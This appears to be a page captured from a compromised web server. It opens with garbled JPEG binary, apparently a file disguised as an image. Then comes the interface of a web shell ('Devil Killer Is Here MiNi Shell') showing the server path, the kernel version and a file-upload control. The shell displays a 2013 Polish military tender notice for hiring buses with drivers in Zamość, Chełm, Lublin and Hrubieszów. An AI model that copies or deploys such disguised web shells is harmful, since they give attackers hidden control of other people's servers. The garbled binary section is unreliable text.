JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130115/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130115/8805-N-2013.html

<p class="kh_header"><b>Zamość: Wykonanie usługi wynajmu autobusów i autokarów wraz z kierowcą celem nieregularnego przewozu osób na potrzeby 32 Wojskowego Oddziału Gospodarczego w Zamościu (32 WOG Zamość) oraz jednostek i instytucji wojskowych będących na zaopatrzeniu logistycznym 32 WOG Zamość, znajdujących się w Lublinie, Zamościu, Chełmie i Hrubieszowie</b><br>
<b>Numer ogłoszenia: 8805 - 2013; data zamieszczenia: 15.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 32 Wojskowy Oddział Gospodarczy w Zamościu , Marszałka Józefa Piłsudskiego 36, 22-400 Zamość, woj. lubelskie, tel. 84 618 15 36, faks 84 618 16 07.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: infrastruktura.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi wynajmu autobusów i autokarów wraz z kierowcą celem nieregularnego przewozu osób na potrzeby 32 Wojskowego Oddziału Gospodarczego w Zamościu (32 WOG Zamość) oraz jednostek i instytucji wojskowych będących na zaopatrzeniu logistycznym 32 WOG Zamość, znajdujących się w Lublinie, Zamościu, Chełmie i Hrubieszowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi wynajmu autobusów i autokarów wraz z kierowcą celem nieregularnego przewozu osób na potrzeby 32 Wojskowego Oddziału Gospodarczego w Zamościu (32 WOG Zamość) oraz  jednostek i instytucji wojskowych znajdujących się na zaopatrzeniu logistycznym 32 WOG Zamość, znajdujących się w Lublinie, Zamościu, Chełmie i Hrubieszowie;
2.	Powyższa usługa ma na celu zabezpieczenie działalności szkoleniowej oraz administracyjnej jednostek i instytucji usytuowanych w powyższych lokalizacjach i może objąć województwo lubelskie, obszar RP. Usługa powinna zapewnić dojazd żołnierzy i pracowników do ośrodków szkolenia poligonowego i innych wojskowych ośrodków szkoleniowych, na strzelnice, szkolenia spadochronowe, do portów lotniczych w czasie przemieszczenia Polskich Kontyngentów Wojskowych, zabezpieczenie uroczystości wojskowych oraz odpraw zgodnie z przesłanymi w tym zakresie potrzebami jednostek wojskowych. Usługa powinna zapewnić również dojazd z miejsc szkolenia do macierzystej jednostki wojskowej;
3.	Wykonywanie przewozów osób na rzecz 32 WOG Zamość oraz jednostek wojskowych będących na jego zaopatrzeniu, będzie odbywać się w sposób nieregularny, wynikający ze zgłaszanych zapotrzebowań, z co najmniej 48 godzinnym wyprzedzeniem a w odniesieniu do zadań, których Zamawiający nie mógł przewidzieć z 12 godzinnym wyprzedzeniem;
4.	Wykonawca zobowiązuje się realizować ww usługę zgodnie z przepisami prawa:
a.	ustawą z 6 września 2001 r. o transporcie drogowym (Dz. U. z 2012, poz. 1265 tekst jednolity z późniejszymi  zmianami);
b.	ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz. U. z 2012 r., poz. 1137 tekst jednolity z późniejszymi zmianami);
c.	ustawą z dnia 16 kwietnia 2004 r. o czasie pracy kierowców (Dz. U. z 2012r. poz. 1155 tekst jednolity z późniejszymi zmianami).
5.	 Wykonywanie usługi winno być wykonane sprawnymi technicznie, posiadającymi aktualne okresowe badania techniczne, środkami transportowymi (własnymi lub podnajętymi);
6.	Wymagane standardowe wyposażenie autokarów:
a.	Oparcia siedzeń z zagłówkami;
b.	Uchylne siedzenia;
c.	Sprawna klimatyzacja i ogrzewanie;
7.	Wykonawca winien posiadać licencję na wykonywanie krajowego transportu drogowego oraz aktualne polisy OC i NNW pojazdów;
8.	W przypadku awarii pojazdu w trakcie wykonania usługi Wykonawca winien zabezpieczyć pojazd zastępczy w czasie do 3 godzin, w przypadku transportu osób na dystansie do 100 km, w przypadku transportu osób na dystansie przekraczającym 100 km czas podstawienia pojazdu zastępczego może się wydłużyć o kolejne 2 godziny na każde 100 km;
9.	 Zamawiający zastrzega sobie możliwość oceny stanu technicznego podstawionych autokarów przez osoby do tego uprawnione, w przypadku zakwestionowania stanu technicznego pojazdu wykonawca winien podstawić sprawny środek transportowy w czasie do 1 godziny;
10.	W przypadku nie podstawienia w umówionych terminach autokarów Zamawiającemu przysługuje prawo dokonania wynajmu autokarów w dowolnie wybranej firmie transportowej na koszt Wykonawcy;
11.	 Koszt przejazdu dojazdu pojazdu  poza trasami  określonymi w pkt 25 pokrywa Wykonawca;
12.	Potwierdzeniem wykonania usługi jest Karta rozliczenia zadania transportowego podpisana przez kierowcę oraz dowódcę dysponenta pojazdu wyznaczonego ze strony Zamawiającego po zakończeniu przewozu;
13.	Wykonawca ponosi koszty ewentualnych opłat parkingowych, przejazdu płatnymi odcinkami autostrad, odcinkami objętych systemem Via TOLL, mycia pojazdu itp. 
14.	Koszty noclegu, wyżywienia kierowcy i należne diety pokrywa Wykonawca;
15.	Wykonawca ponosi koszt oczekiwania pojazdu w dyspozycji Zamawiającego związanego z czynnościami załadowczo-wyładowczymi; 
16.	 Przewozy odbywać się będą głównie w ciągu jednej doby (wyjazd i powrót tego  samego dnia), jak również objąć mogą wyjazdy, których zakończenie nastąpi w dniu następnym a wynikać będzie to z długości trasy;
17.	Przewozy obejmować mogą również dni tzw. wolne od pracy to jest soboty, niedziele i święta;
18.	 W przypadkach przewozu osób w jedną stronę Wykonawcy przysługuje zwrot   kosztów przejazdu powrotnego po tej samej trasie w cenie za 1km trasy przewozu osób.
19.	Wykonawca zobowiązuje się odbyć podróż najkrótszą możliwą trasą przejazdu uzgadniając ją z Zamawiającym;
20.	Wykonawca zobowiązany jest do podstawienia autokaru autokarów w sposób uzgodniony z przedstawicielem Zamawiającego o określonej ilości miejsc siedzących zabezpieczających potrzeby Zamawiającego;
21.	Zamawiający zastrzega sobie prawo zamawiania autokaru autokarów na 48 godzin przed rozpoczęciem świadczenia usługi, a w wyjątkowych sytuacjach 12 godzin przed wyjazdem; jak również odwołania uzgodnionego wcześniej przewozu na 8 godzin przed rozpoczęciem świadczenia usługi;
22.	Wynagrodzenie Wykonawcy wyliczone zostanie po zakończeniu każdej usługi za  przejechane kilometry na podstawie Karty rozliczenia zadania transportowego.
23.	Wysokość wynagrodzenia Wykonawcy to iloczyn ceny jednostkowej za 1 km  i ilości przejechanych km;
24.	Zamówienie zostało podzielone na cztery części według miejsca rozpoczęcia - zakończenia przewozu osób:

a.	Część nr 1 - Przewóz osób z (lub do) Jednostki  Wojskowej 3391 oraz Jednostki  Wojskowej 5371, ul. Marszałka Józefa Piłsudskiego 36, 22-400 Zamość, szacowana ilość kilometrów w trakcie obowiązywania umowy wynosi 7 000 km; 
b.	Część nr 2 - Przewóz osób z (lub do) Jednostki  Wojskowej 1230, ul. Lubelska 139, 22-100 Chełm, szacowana ilość kilometrów w trakcie obowiązywania umowy wynosi 3 500 km;
c.	Część nr 3 - Przewóz osób z (lub do) batalionu dowodzenia Wielonarodowej Brygady, ul. Kruczkowskiego 49, 20-400 Lublin, szacowana ilość kilometrów w trakcie obowiązywania umowy wynosi 7 000 km;
d.	Część nr 4 - Przewóz osób z (lub do) Jednostki Wojskowej 4055, ul. Dwernickiego 4, 22 - 500 Hrubieszów, szacowana ilość kilometrów w trakcie obowiązywania umowy wynosi 20 000 km

25.	 Planowane trasy przejazdów z podziałem na części:
Część 1

Lp.	Trasa przejazdu	Szacunkowa długość trasy jednego kursu	Przewidywana ilość osób do przewiezienia w jednym kursie	Planowana ilość kursów
w okresie umowy	Uwagi
1.		Zamość - Nowa Dęba - Zamość	300	240 	2	przewóz osób w jedną stronę
2.		Zamość - Nowa Dęba - Zamość	300	180	2	przewóz osób w jedną stronę
3.		Zamość - Orzysz - Zamość	750	48	1	przewóz osób w jedną stronę
4.		Zamość - Orzysz - Zamość	750	48	1	przewóz osób w jedną stronę
RAZEM  km: dł.trasy x ilość kursów x ilość autokarów (48 osob.)	6 900	




Część 2

Lp.	Trasa przejazdu	Szacunkowa długość trasy jednego kursu	Przewidywana ilość osób do przewiezienia w jednym kursie	Planowana ilość kursów
w okresie umowy	Uwagi
1.		Chełm - Nowa Dęba - Chełm	380	144	1	przewóz osób w jedną stronę
2.		Chełm - Nowa Dęba - Chełm	380	96	1	przewóz osób w jedną stronę
3.		Chełm - Orzysz - Chełm	750	48	1	przewóz osób w jedną stronę
4.		Chełm - Orzysz - Chełm	750	48	1	przewóz osób w jedną stronę
RAZEM  km: dł.trasy x ilość kursów x ilość autokarów (48 osob.)	3 400	


Część 3

Lp.	Trasa przejazdu	Szacunkowa długość trasy jednego kursu	Przewidywana ilość osób do przewiezienia w jednym kursie	Planowana ilość kursów
w okresie umowy	Uwagi
1.		Lublin - Nowa Dęba - Lublin	320	144	2	przewóz osób w jedną stronę
2.		Lublin - Nowa Dęba - Lublin	320	144	2	przewóz osób w jedną stronę
3.		Lublin - Zamość - Lublin	175	96	5	
4.		Lublin -  Bydgoszcz - Szczecin - Lublin	1300	40	1	
RAZEM  km: dł.trasy x ilość kursów x ilość autokarów (48 osob.)	6 890	

Część 4	
Lp.	Trasa przejazdu	Szacunkowa długość trasy jednego kursu	Przewidywana ilość osób do przewiezienia w jednym kursie	Planowana ilość kursów
w okresie umowy	Uwagi
1.		Hrubieszów - Dęblin - Werbkowice - Zamość - Hrubieszów	400	48	4	
2.		Hrubieszów - Dęblin - Okuninka kWłodawy - Hrubieszów 	420	48	1	
3.		Hrubieszów - Powidz  - Hrubieszów	940	48	1	przewóz osób w jedną stronę
4.		Hrubieszów - Powidz  - Hrubieszów	940	112	1	
5.		Hrubieszów - Dęblin - Drawsko Pom. 	1500	112	2	
6.		Hrubieszów - Gdynia - Hrubieszów 	1250	48	2	
7.		Hrubieszów - Dęblin - Nowa Dęba - Hrubieszów 	650	48	2	
8.		Hrubieszów - Nowa Dęba - Hrubieszów 	400	48	2	przewóz osób w jedną stronę
RAZEM  km: dł.trasy x ilość kursów x ilość autokarów (48 osob.)	19 380	

26.	Zamawiający przewiduje wykorzystanie autokarów do przejazdów lokalnych: to jest na trasach o długości do 100 km oraz w obrębie jednej miejscowości. Szacowana ilość tego rodzaju przejazdów nie przekroczy 5% ogólnej liczby kilometrów dla poszczególnych części to jest:
a.	Część 1 -    350 km
b.	Część 2 -    175 km
c.	Część 3 -    350 km
d.	Część 4 - 1 000 km
27.	Wykonawca winien posiadać taką ilość autokarów przystosowanych konstrukcyjnie do przewozu minimum 48 osób - każdy, aby zapewnić przewóz jednorazowo:
a.	Część 1 - 240 osoby w jednym kursie (plus jeden autokar jako pojazd zastępczy) wraz z kierowcami posiadającymi wymagane uprawnienia (prawo jazdy);
b.	Część 2 - 144 osoby w jednym kursie (plus jeden autokar jako pojazd zastępczy) wraz z kierowcami posiadającymi wymagane uprawnienia (prawo jazdy);
c.	Część 3 - 144 osoby w jednym kursie (plus jeden autokar jako pojazd zastępczy) wraz z kierowcami posiadającymi wymagane uprawnienia (prawo jazdy);
d.	Część 4 - 144 osoby w jednym kursie (plus jeden autokar jako pojazd zastępczy) wraz z kierowcami posiadającymi wymagane uprawnienia (prawo jazdy);.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających - art. 67 ust 1 pkt. 6) ustawy P. z. p. stanowiących nie więcej niż 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.17.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta na każdą część musi być zabezpieczona wadium w kwocie:
Część 1 -     700,00 zł (słownie: siedemset złotych);
Część 2 -     300,00 zł (słownie: trzysta złotych);
Część 3 -     600,00 zł (słownie: sześćset złotych);
Część 4 -  1 500,00 zł (słownie: jeden tysiąc pięćset złotych).

2.	Wadium może być wniesione w jednej lub w kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

3.	Wadium w formie pieniężnej należy wpłacić  przelewem na rachunek bankowy     32 Wojskowego Oddziału Gospodarczego w Zamościu, ul. Marszałka Józefa Piłsudskiego 36, 22-400 Zamość, konto nr: 30 1010 1339 0057 5713 9120 0000
Wadium musi być wniesione najpóźniej do godz. 13.00 dnia 25.01.2013 r.
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w wyżej wymienionym terminie znajdzie się na rachunku bankowym 32 Wojskowego Oddziału Gospodarczego w Zamościu. 

4.	Wadium w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez podmioty o których mowa w ustawie o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału w budynku nr 29 pok. nr 15 (Sekcja Zamówień Publicznych), 32 Wojskowego Oddziału Gospodarczego w Zamościu, ul. Marszałka Józefa Piłsudskiego 36, 22-400 Zamość, najpóźniej do godz. 13.00  dnia 25.01.2013 r. 
Z treści gwarancji (poręczenia) musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną  pieczątką lub czytelny (z podaniem imienia i nazwiska).
Z treści gwarancji winno wynikać bezwarunkowe - na każde pisemne żądanie zgłoszone przez 32 Wojskowy Oddział Gospodarczy w Zamościu, ul. Marszałka Józefa Piłsudskiego 36, 22-400 Zamość, w terminie związania ofertą - zobowiązanie Gwaranta do wypłaty 32 Wojskowemu Oddziałowi Gospodarczemu w Zamościu,     ul. Marszałka Józefa Piłsudskiego 36, 22-400 Zamościu, pełnej kwoty wadium w okolicznościach określonych w art. 46 ustawy Prawo zamówień publicznych.
5.	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
6.	Zamawiający zwraca wadium wszystkim wykonawcom po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy prawo zamówień publicznych.
7.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
8.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ustawy prawo zamówień publicznych, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego. 
10.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nielezących po jego stronie.
11.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, iż  posiada licencje na krajowy transport drogowy osób wydaną przez właściwy organa zgodnie z Ustawą z 06 września 2001 r., o transporcie drogowym (Dz. U. z 2012 roku, poz. 1265 tekst jednolity z późniejszymi  zmianami</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże się wiedzą i doświadczeniem w wykonaniu lub wykonywaniu co najmniej 2 usług odpowiadających swoim rodzajem przedmiotowi zamówienia o wartości minimum 14 000,00 zł brutto każda, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie Części 1:
a)	minimum 6 autokarami przystosowanymi konstrukcyjnie do przewozu minimum 48 osób każdy. Pojazdy muszą posiadać aktualne badania techniczne, polisę OC, polisę NNW;

w zakresie Części 2:
a)	minimum 4 autokarami przystosowanymi konstrukcyjnie do przewozu minimum 48 osób każdy. Pojazdy muszą posiadać aktualne badania techniczne, polisę OC, polisę NNW;
 
w zakresie Części 3:
a)	minimum 4 autokarami przystosowanymi konstrukcyjnie do przewozu minimum 48 osób każdy. Pojazdy muszą posiadać aktualne badania techniczne, polisę OC, polisę NNW;

w zakresie Części 4:
a)	minimum 4 autokarami przystosowanymi konstrukcyjnie do przewozu minimum 48 osób każdy. Pojazdy muszą posiadać aktualne badania techniczne, polisę OC, polisę NNW;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie Części 1:
a)	minimum 6 kierowcami, którzy będą uczestniczyć w wykonywaniu zamówienia posiadającymi kwalifikacje  zawodowe, to jest uprawnienia do kierowania pojazdami zgodnie z ustawą z dnia 5 stycznia 2011 roku o kierujących pojazdami, (Dz. U. z 2011 roku nr 30, poz.151 tekst jednolity z późniejszymi  zmianami);

w zakresie Części 2:
a)	minimum 4 kierowcami, którzy będą uczestniczyć w wykonywaniu zamówienia posiadającymi kwalifikacje  zawodowe, to jest uprawnienia do kierowania pojazdami zgodnie z ustawą z dnia 5 stycznia 2011 roku o kierujących pojazdami, (Dz. U. z 2011 roku nr 30, poz.151 tekst jednolity z późniejszymi  zmianami); 
w zakresie Części 3:
a)	minimum 4 kierowcami, którzy będą uczestniczyć w wykonywaniu zamówienia posiadającymi kwalifikacje  zawodowe, to jest uprawnienia do kierowania pojazdami zgodnie z ustawą z dnia 5 stycznia 2011 roku o kierujących pojazdami, (Dz. U. z 2011 roku nr 30, poz.151 tekst jednolity z późniejszymi  zmianami); 


w zakresie Części 4:
a)	minimum 4 kierowcami, którzy będą uczestniczyć w wykonywaniu zamówienia posiadającymi kwalifikacje  zawodowe, to jest uprawnienia do kierowania pojazdami zgodnie z ustawą z dnia 5 stycznia 2011 roku o kierujących pojazdami, (Dz. U. z 2011 roku nr 30, poz.151 tekst jednolity z późniejszymi  zmianami).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do reprezentacji lub reprezentacji i  zawarcia umowy wystawione przez wszystkich Wykonawców w przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia</p>
